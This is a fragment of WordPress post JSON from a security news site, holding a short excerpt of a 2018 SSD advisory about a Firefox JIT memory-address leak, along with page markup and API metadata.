Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3766\" 
target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Tue, 09 Oct 2018 08:55:15 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary A vulnerability where the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments that results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function which can be used as part of an exploit inside the sandboxed content process. Vendor Response &#8220;Security vulnerabilities &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3766\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Firefox Information Leak<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[19715,10757],"class_list":["post-13544","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-leak","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post
=13544"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13544\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13544"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}